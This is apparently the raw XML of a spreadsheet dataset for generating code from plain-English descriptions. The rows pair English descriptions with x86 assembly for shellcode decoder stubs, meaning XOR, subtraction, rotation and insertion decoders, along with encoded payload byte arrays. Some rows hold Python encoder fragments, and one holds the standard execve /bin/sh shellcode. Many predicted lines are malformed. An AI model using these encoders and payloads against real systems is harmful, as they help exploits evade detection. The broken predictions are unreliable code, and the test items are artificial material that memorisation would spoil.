e,0x18,0x8e,0x1c,0x92,0x0d,0x32,0x87,0x17,0x4d,0xd9,0xe5,0x84,0xc1,0xbc,0x12,0xa5,0x11,0x27,0x88</t>
  </si>
  <si>
    <t>cmp byte [esi], 0x88</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>zero out the ecx register and move 23 into the lower byte of the register</t>
  </si>
  <si>
    <t>zero out the ebx register and move the next byte of the shellcode into the lower byte of the register</t>
  </si>
  <si>
    <t>clear the edx register and move the current byte of the shellcode into the lowest byte of the register</t>
  </si>
  <si>
    <t>perform the xor between the next byte of the shellcode and the dl register</t>
  </si>
  <si>
    <t>xor byte [esi+1], dl</t>
  </si>
  <si>
    <t>perform the xor between the current byte of the shellcode and the dl register</t>
  </si>
  <si>
    <t>xor byte [esi], dl</t>
  </si>
  <si>
    <t>'xor dl , byte [esi]'</t>
  </si>
  <si>
    <t>load the effective address of esi+2 into esi</t>
  </si>
  <si>
    <t>lea esi, [esi+2]</t>
  </si>
  <si>
    <t>move the address of esi-1 into dl</t>
  </si>
  <si>
    <t>mov dl, [esi-1]</t>
  </si>
  <si>
    <t>'mov dl , esi-1'</t>
  </si>
  <si>
    <t>decode label</t>
  </si>
  <si>
    <t>jump to not_equal if the current byte of the shellcode is not equal to bl</t>
  </si>
  <si>
    <t>jne short not_equal</t>
  </si>
  <si>
    <t>perform the xor between the byte in esi and dl</t>
  </si>
  <si>
    <t>decrease the counter and jump to decode if not zero</t>
  </si>
  <si>
    <t>not_equal label</t>
  </si>
  <si>
    <t>not_equal:</t>
  </si>
  <si>
    <t>not_equal :</t>
  </si>
  <si>
    <t>move the current byte of the shellcode to the bl</t>
  </si>
  <si>
    <t>mov bl, [esi]</t>
  </si>
  <si>
    <t>move the previous byte of the shellcode to dl</t>
  </si>
  <si>
    <t>perform the xor between the current byte in esi and dl</t>
  </si>
  <si>
    <t>decrease the counter and jump to decode if not zero else jump short to shellcode</t>
  </si>
  <si>
    <t>define shellcode as array of the bytes 0xf1,0x31,0x90,0x38,0x47,0x47,0x5c,0x1b,0x1b,0x47,0x4d,0x0b,0x07,0xe7,0x6a,0xb3,0xd9,0x6b,0xb1,0xda,0x68,0x51,0xbb,0xc6,0x4d</t>
  </si>
  <si>
    <t>shellcode: db 0xf1,0x31,0x90,0x38,0x47,0x47,0x5c,0x1b,0x1b,0x47,0x4d,0x0b,0x07,0xe7,0x6a,0xb3,0xd9,0x6b,0xb1,0xda,0x68,0x51,0xbb,0xc6,0x4d</t>
  </si>
  <si>
    <t>'shellcode : db 0xf1 , 0x31 , 0x90 , 0x38 , 0x47 , 0x47 , 0x5c , 0x1b , 0x1b , 0x47 , 0x4d , 0x0b , 0x07 , 0xe7 , 0x6a , 0xb3 , 0xd9 , 0x6b , 0xb1 , 0xda , 0x68 , 0x51 , 0xbb , 0xc6 , 0x4d'</t>
  </si>
  <si>
    <t>xor dl , byte [esi+1]</t>
  </si>
  <si>
    <t>xor byte [esi] , dl</t>
  </si>
  <si>
    <t>lea var1 , [esi+2]</t>
  </si>
  <si>
    <t>mov dl , [esi-1]</t>
  </si>
  <si>
    <t>cmp BYTE [esi] , bl \n jne not_equal</t>
  </si>
  <si>
    <t>mov dl , byte [esi]</t>
  </si>
  <si>
    <t>shellcode : db 0xf1 , 0x31 , 0x90 , 0x38 , 0x47 , 0x47 , 0x5c , 0x1b , 0x1b , 0x47 , 0x4d , 0x0b , 0x07 , 0xe7 , 0x6a , 0xb3 , 0xd9 , 0x6b , 0xb1 , 0xda , 0x68 , 0x51 , 0xbb , 0xc6 , 0x4d</t>
  </si>
  <si>
    <t>mov cl, 23</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov bl, [esi+1]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov dl, [esi]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jne not_equal</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>cmp byte [esi], bl</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov cl , 23</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov bl , 23</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov cl , [esi+1]'</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>inc esi \n inc esi</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>loopnz short decode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jump short to get_shellcode_addr</t>
  </si>
  <si>
    <t>jmp short get_shellcode_addr</t>
  </si>
  <si>
    <t>returnlabel label</t>
  </si>
  <si>
    <t>returnlabel:</t>
  </si>
  <si>
    <t>returnlabel :</t>
  </si>
  <si>
    <t>clear the eax register and move 22 into the lower byte of the register</t>
  </si>
  <si>
    <t>define decode function and subtract 13 from the current byte of the shellcode</t>
  </si>
  <si>
    <t>decrement the al register and jump to shellcode if the result is zero</t>
  </si>
  <si>
    <t>get_shellcode_addr function</t>
  </si>
  <si>
    <t>get_shellcode_addr:</t>
  </si>
  <si>
    <t>call get_shellcode_addr</t>
  </si>
  <si>
    <t>call returnlabel</t>
  </si>
  <si>
    <t>define the array of bytes shellcode 0x3e, 0xcd, 0x5d, 0x96, 0xef, 0x75, 0x3c, 0x3c, 0x80, 0x75, 0x75, 0x3c, 0x6f, 0x76, 0x7b, 0x96, 0xf0, 0x5d, 0xbd, 0x18, 0xda, 0x8d</t>
  </si>
  <si>
    <t>shellcode: db 0x3e, 0xcd, 0x5d, 0x96, 0xef, 0x75, 0x3c, 0x3c, 0x80, 0x75, 0x75, 0x3c, 0x6f, 0x76, 0x7b, 0x96, 0xf0, 0x5d, 0xbd, 0x18, 0xda, 0x8d</t>
  </si>
  <si>
    <t>'0x3e , 0xcd , 0x5d , 0x96 , 0xef , 0x75 , 0x3c , 0x3c , 0x80 , 0x75 , 0x75 , 0x3c , 0x6f , 0x76 , 0x7b , 0x96 , 0xf0 , 0x5d , 0xbd , 0x18 , 0xda , 0x8d : db var1'</t>
  </si>
  <si>
    <t>ret</t>
  </si>
  <si>
    <t>dec byte [esi] , 13</t>
  </si>
  <si>
    <t>get_shellcode_addr :</t>
  </si>
  <si>
    <t>shellcode : db 0x3e , 0xcd , 0x5d , 0x96 , 0xef , 0x75 , 0x3c , 0x3c , 0x80 , 0x75 , 0x75 , 0x3c , 0x6f , 0x76 , 0x7b , 0x96 , 0xf0 , 0x5d , 0xbd , 0x18 , 0xda , 0x8d</t>
  </si>
  <si>
    <t>mov al, 22</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">decode: </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sub byte [esi], 13</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">dec al </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov al, 15</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>dec al</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>decoder label</t>
  </si>
  <si>
    <t>zero out the edi, eax, ebx and edx registers</t>
  </si>
  <si>
    <t>move the byte at the address esi+edi into bl</t>
  </si>
  <si>
    <t>mov bl, byte [esi + edi]</t>
  </si>
  <si>
    <t>move the byte at the address esi+edi+1 into dl</t>
  </si>
  <si>
    <t>mov dl, byte [esi + edi + 1]</t>
  </si>
  <si>
    <t>perform xor between bl and dl and jump short to shellcode if the result is not zero</t>
  </si>
  <si>
    <t>move dl into cl</t>
  </si>
  <si>
    <t>mov cl, dl</t>
  </si>
  <si>
    <t>right rotate bl by the contents of cl</t>
  </si>
  <si>
    <t>ror bl, cl</t>
  </si>
  <si>
    <t>move bl into the byte defined by the address esi + eax</t>
  </si>
  <si>
    <t>mov byte [esi + eax], bl</t>
  </si>
  <si>
    <t>add 2 to edi</t>
  </si>
  <si>
    <t>add edi, 2</t>
  </si>
  <si>
    <t>point to the next byte in the eax register</t>
  </si>
  <si>
    <t>shellcode is an array of bytes 0xc6,0x02,0x80,0x01,0x81,0x03,0xd1,0x01,0xbe,0x02,0x5f,0x01,0x98,0x03,0x1c,0x06,0x60,0x08,0xf6,0x04,0xc5,0x01,0x92,0x04,0x30,0x07,0x64,0x06,0x3a,0x04,0x58,0x08,0x4f,0x03,0x59,0x05,0xd2,0x06,0x81,0x08,0x1a,0x04,0x5f,0x07,0x03,0x08,0xd8,0x04,0x0c,0x04, 0xbb, 0xbb</t>
  </si>
  <si>
    <t>shellcode: db 0xc6,0x02,0x80,0x01,0x81,0x03,0xd1,0x01,0xbe,0x02,0x5f,0x01,0x98,0x03,0x1c,0x06,0x60,0x08,0xf6,0x04,0xc5,0x01,0x92,0x04,0x30,0x07,0x64,0x06,0x3a,0x04,0x58,0x08,0x4f,0x03,0x59,0x05,0xd2,0x06,0x81,0x08,0x1a,0x04,0x5f,0x07,0x03,0x08,0xd8,0x04,0x0c,0x04, 0xbb, 0xbb</t>
  </si>
  <si>
    <t>mov bl , byte [esi+edi]</t>
  </si>
  <si>
    <t>mov dl , byte [esi+edi+1]</t>
  </si>
  <si>
    <t>mov cl , dl</t>
  </si>
  <si>
    <t>ror bl , cl</t>
  </si>
  <si>
    <t>add edi , 2</t>
  </si>
  <si>
    <t>0xc6 , 0x02 , 0x80 , 0x01 , 0x81 , 0x03 , 0xd1 , 0x01 , 0xbe , 0x02 , 0x5f , 0x01 , 0x98 , 0x03 , 0x1c , 0x06 , 0x60 , 0x08 , 0xf6 , 0x04 , 0xc5 , 0x01 , 0x92 , 0x04 , 0x30 , 0x07 , 0x64 , 0x06 , 0x3a , 0x04 , 0x58 , 0x08 , 0x4f , 0x03 , 0x59 , 0x05 , 0xd2 , 0x06 , 0x81 , 0x08 , 0x1a , 0x04 , 0x5f , 0x07 , 0x03 , 0x08 , 0xd8 , 0x04 , 0x0c , 0x04 , 0xbb , 0xbb : db var1 , 0x20</t>
  </si>
  <si>
    <t>xor edi, edi</t>
  </si>
  <si>
    <t>xor bl, dl</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>cause both eax and edx to become zero</t>
  </si>
  <si>
    <t>zero the value on ebp</t>
  </si>
  <si>
    <t>xor ebp, ebp</t>
  </si>
  <si>
    <t>'xor ebp , ebp'</t>
  </si>
  <si>
    <t>put the byte in esi into dl</t>
  </si>
  <si>
    <t>mov dl, byte [esi]</t>
  </si>
  <si>
    <t>'mov dl , byte [esi]'</t>
  </si>
  <si>
    <t>shift right the dl register by 4 bits</t>
  </si>
  <si>
    <t>shr dl, 4</t>
  </si>
  <si>
    <t>'shr dl , 4'</t>
  </si>
  <si>
    <t>shift left the eax register by 28 bits</t>
  </si>
  <si>
    <t>shl eax, 28</t>
  </si>
  <si>
    <t>'shl eax , 28'</t>
  </si>
  <si>
    <t>shift right 28 of eax</t>
  </si>
  <si>
    <t>shr eax, 28</t>
  </si>
  <si>
    <t>'shr eax , 28'</t>
  </si>
  <si>
    <t>subtract al from dl and jump to decode_pr if the sign flag is zero</t>
  </si>
  <si>
    <t>in the negative function negate dl and increment dl to the next byte</t>
  </si>
  <si>
    <t>decode_pr function</t>
  </si>
  <si>
    <t>decode_pr:</t>
  </si>
  <si>
    <t>clear eax, ebx and ecx</t>
  </si>
  <si>
    <t>put the byte at the address esi+1+ebp into al</t>
  </si>
  <si>
    <t>mov al, byte [esi+1+ebp]</t>
  </si>
  <si>
    <t>copy the value of ebp to ecx</t>
  </si>
  <si>
    <t>mov ecx, ebp</t>
  </si>
  <si>
    <t>'mov ecx , ebp'</t>
  </si>
  <si>
    <t>perform xor between cl and 0x32 and jump short to encodedshellcode is the result is zero</t>
  </si>
  <si>
    <t>put the contents of the al into the cl register</t>
  </si>
  <si>
    <t>mov cl, al</t>
  </si>
  <si>
    <t>'mov cl , al'</t>
  </si>
  <si>
    <t>subtract the contents of dl from the cl register</t>
  </si>
  <si>
    <t>sub cl, dl</t>
  </si>
  <si>
    <t>backup the contents of cl into bl</t>
  </si>
  <si>
    <t>mov bl, cl</t>
  </si>
  <si>
    <t>'mov bl , cl'</t>
  </si>
  <si>
    <t>backup cl into al</t>
  </si>
  <si>
    <t>mov al, cl</t>
  </si>
  <si>
    <t>right shift the contents of bl by 4</t>
  </si>
  <si>
    <t>shr bl, 4</t>
  </si>
  <si>
    <t>'shr bl , 4'</t>
  </si>
  <si>
    <t>shift left 28 bits of eax</t>
  </si>
  <si>
    <t>shift right 24 of eax</t>
  </si>
  <si>
    <t>shr eax, 24</t>
  </si>
  <si>
    <t>'shr eax , 24'</t>
  </si>
  <si>
    <t>add the value on ebx to eax</t>
  </si>
  <si>
    <t>add eax, ebx</t>
  </si>
  <si>
    <t>'add eax , ebx'</t>
  </si>
  <si>
    <t>move the value 0xff into bl</t>
  </si>
  <si>
    <t>mov bl, 0xff</t>
  </si>
  <si>
    <t>'mov bl , 0xff'</t>
  </si>
  <si>
    <t>subtract the contents of al from the bl register</t>
  </si>
  <si>
    <t>sub bl, al</t>
  </si>
  <si>
    <t>put the value of bl to the position of edi</t>
  </si>
  <si>
    <t>mov byte [edi], bl</t>
  </si>
  <si>
    <t>add 0x2 to ebp</t>
  </si>
  <si>
    <t>add ebp, 0x2</t>
  </si>
  <si>
    <t>'add ebp , 0x2'</t>
  </si>
  <si>
    <t>call_shellcode routine</t>
  </si>
  <si>
    <t>encodedshellcode is the array of bytes 0x43,0xed,0x1d,0xf4,0x40,0xfb,0x6f,0x7a,0xa9,0xe,0xb6,0xe,0xbc,0xc9,0xe3,0x7a,0xaf,0x7a,0x78,0xe,0xc5,0xda,0x76,0x6a,0x17,0x1a,0x4e,0x68,0x38,0xc2,0x99,0xfb,0x35,0x68,0x84,0xd2,0xb3,0xcb,0x7c,0x68,0x78,0xe2,0x9a,0xf5,0xe9,0x50,0xc0,0x24,0x91,0xf8,0xfe</t>
  </si>
  <si>
    <t>encodedshellcode: db 0x43,0xed,0x1d,0xf4,0x40,0xfb,0x6f,0x7a,0xa9,0xe,0xb6,0xe,0xbc,0xc9,0xe3,0x7a,0xaf,0x7a,0x78,0xe,0xc5,0xda,0x76,0x6a,0x17,0x1a,0x4e,0x68,0x38,0xc2,0x99,0xfb,0x35,0x68,0x84,0xd2,0xb3,0xcb,0x7c,0x68,0x78,0xe2,0x9a,0xf5,0xe9,0x50,0xc0,0x24,0x91,0xf8,0xfe</t>
  </si>
  <si>
    <t>'encodedshellcode : db 0x43 , 0xed , 0x1d , 0xf4 , 0x40 , 0xfb , 0x6f , 0x7a , 0xa9 , 0xe , 0xb6 , 0xe , 0xbc , 0xc9 , 0xe3 , 0x7a , 0xaf , 0x7a , 0x78 , 0xe , 0xc5 , 0xda , 0x76 , 0x6a , 0x17 , 0x1a , 0x4e , 0x68 , 0x38 , 0xc2 , 0x99 , 0xfb , 0x35 , 0x68 , 0x84 , 0xd2 , 0xb3 , 0xcb , 0x7c , 0x68 , 0x78 , 0xe2 , 0x9a , 0xf5 , 0xe9 , 0x50 , 0xc0 , 0x24 , 0x91 , 0xf8 , 0xfe'</t>
  </si>
  <si>
    <t>xor ebp , ebp</t>
  </si>
  <si>
    <t>shr dl , 4</t>
  </si>
  <si>
    <t>shl eax , 28</t>
  </si>
  <si>
    <t>shr eax , 28</t>
  </si>
  <si>
    <t>decode_pr :</t>
  </si>
  <si>
    <t>mov al , byte [esi+1+ebp]</t>
  </si>
  <si>
    <t>mov ecx , ebp</t>
  </si>
  <si>
    <t>mov cl , al</t>
  </si>
  <si>
    <t>sub cl , dl</t>
  </si>
  <si>
    <t>mov bl , cl</t>
  </si>
  <si>
    <t>mov al , cl</t>
  </si>
  <si>
    <t>shr bl , 4</t>
  </si>
  <si>
    <t>shr eax , 24</t>
  </si>
  <si>
    <t>add eax , ebx</t>
  </si>
  <si>
    <t>mov bl , 0xff</t>
  </si>
  <si>
    <t>sub bl , al</t>
  </si>
  <si>
    <t>add ebp , 0x2</t>
  </si>
  <si>
    <t>encodedshellcode : db 0x43 , 0xed , 0x1d , 0xf4 , 0x40 , 0xfb , 0x6f , 0x7a , 0xa9 , 0xe , 0xb6 , 0xe , 0xbc , 0xc9 , 0xe3 , 0x7a , 0xaf , 0x7a , 0x78 , 0xe , 0xc5 , 0xda , 0x76 , 0x6a , 0x17 , 0x1a , 0x4e , 0x68 , 0x38 , 0xc2 , 0x99 , 0xfb , 0x35 , 0x68 , 0x84 , 0xd2 , 0xb3 , 0xcb , 0x7c , 0x68 , 0x78 , 0xe2 , 0x9a , 0xf5 , 0xe9 , 0x50 , 0xc0 , 0x24 , 0x91 , 0xf8 , 0xfe</t>
  </si>
  <si>
    <t xml:space="preserve">xor ecx, ecx </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jns decode_pr</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sub dl, al</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">negative: </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">not dl </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>inc dl</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>je short encodedshellcode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor cl, 0x32</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encodedshellcode : (db 0xd6 , 0x47 , 0xb7 , 0x9f , 0xd8 , 0xd8 , 0x94 , 0x9f , 0x9f , 0xd8 , 0xa5 , 0x9e , 0x99 , 0x7e , 0x24 , 0xb7 , 0x7e , 0x25 , 0xb4 , 0x7e , 0x26 , 0x57 , 0xfc , 0x3a , 0x87)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>x = x x</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>je xor decode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve"> x += 1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mul ebx,</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor ebxebx</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encoded += '%02x, ' % 0xAA'</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' )</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">mov dl0x19, </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov bl , 0x19</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>call_decoded</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encoded_shellcode += encoded_shellcode += '\\x'</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>X = '%02x' % XOR % XOR</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>m = max_bits - 2 * m</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>stage</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encoded + '\n'</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encoded + '%02x, ' % x'</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encoded + '%02x, ' % x</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encoded += 0xAA</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor bl</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>call_</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>short decode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>decoder</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov call_shellcode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encoded_shellcode  '0x'</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>z x ^ 10</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encoded_shellcode += '%02x' % ( z )</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encoded_shellcode += '0x'</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encoded += '\n'’</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov byte [esi]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor byte [esi]'</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>call_decode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>if rot &lt;&gt; 1 :</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov byte [esi+eax]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jmp short decoder</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>0x'</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>x</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>insertByte = hex ( random . randint ( 1 , 256 ) )</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encoded += insertByte [ 3 : ]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">mov edi </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov edi</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">mov eax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</si>
</sst>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9"/>
      <name val="等线"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="等线"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <i/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="等线"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="16"/>
      <color theme="1"/>
      <name val="等线"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="20"/>
      <color theme="1"/>
      <name val="等线"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="14"/>
      <color rgb="FFFF0000"/>
      <name val="等线"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="14"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="14"/>
      <color rgb="FFFF000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32">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" quotePrefix="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="3"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5" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="7"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vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
  </cellXfs>
  <cellStyles count="2">
    <cellStyle name="常规" xfId="0" builtinId="0"/>
    <cellStyle name="常规 2" xfId="1" xr:uid="{904260AC-9CFE-4C9D-BF8F-1F9B871B7A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zoomScale="85" zoomScaleNormal="85" workbookViewId="0">
      <selection activeCell="C40" sqref="C40"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="37.77734375" customWidth="1"/>
    <col min="2" max="2" width="38" customWidth="1"/>
    <col min="3" max="3" width="30.77734375" customWidth="1"/>
    <col min="5" max="5" width="11.44140625" customWidth="1"/>
    <col min="6" max="6" width="30.33203125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="38.4" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="21" t="s">
        <v>119</v>
      </c>
      <c r="B1" s="22"/>
      <c r="C1" s="22"/>
      <c r="D1" s="22"/>
      <c r="E1" s="22"/>
      <c r="F1" s="22"/>
      <c r="G1" s="22"/>
      <c r="H1" s="22"/>
    </row>
    <row r="2" spans="1:8" ht="25.2" x14ac:dyDescent="0.45">
      <c r="A2" s="25" t="s">
        <v>0</v>
      </c>
      <c r="B2" s="25"/>
      <c r="C2" s="25"/>
      <c r="D2" s="25"/>
      <c r="E2" s="25"/>
      <c r="F2" s="25"/>
      <c r="G2" s="25"/>
      <c r="H2" s="25"/>
    </row>
    <row r="3" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3" s="4" t="s">
        <v>1</v>
      </c>
      <c r="B3" s="4" t="s">
        <v>2</v>
      </c>
      <c r="C3" s="4" t="s">
        <v>3</v>
      </c>
      <c r="D3" s="4" t="s">
        <v>5</v>
      </c>
      <c r="E3" s="4" t="s">
        <v>6</v>
      </c>
      <c r="F3" s="4" t="s">
        <v>4</v>
      </c>
      <c r="G3" s="4" t="s">
        <v>5</v>
      </c>
      <c r="H3" s="4" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="4" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A4" s="1" t="s">
        <v>7</v>
      </c>
      <c r="B4" s="3" t="s">
        <v>23</v>
      </c>
      <c r="C4" s="3" t="s">
        <v>23</v>
      </c>
